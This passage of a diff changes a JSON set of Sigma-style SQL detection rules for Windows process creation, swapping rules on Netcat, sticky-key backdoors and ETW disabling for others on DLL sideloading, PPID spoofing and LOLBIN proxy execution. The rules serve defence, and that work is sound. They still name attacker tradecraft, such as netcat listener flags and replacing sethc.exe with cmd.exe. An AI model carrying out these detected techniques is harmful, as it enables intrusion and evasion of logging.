LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": 
"PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate ncat use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nc.exe' ESCAPE '\\' OR Image LIKE '%\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR 
OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "status": "test", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1216" ], "falsepositives": [ - "Very Possible" + "Unlikely" ], 
- "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1216.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Msra.exe" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "status": "experimental", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ "attack.defense_evasion", 
@@ -13609,3213 +13446,3285 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "status": "experimental", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate installation of a new screensaver" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' 
ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
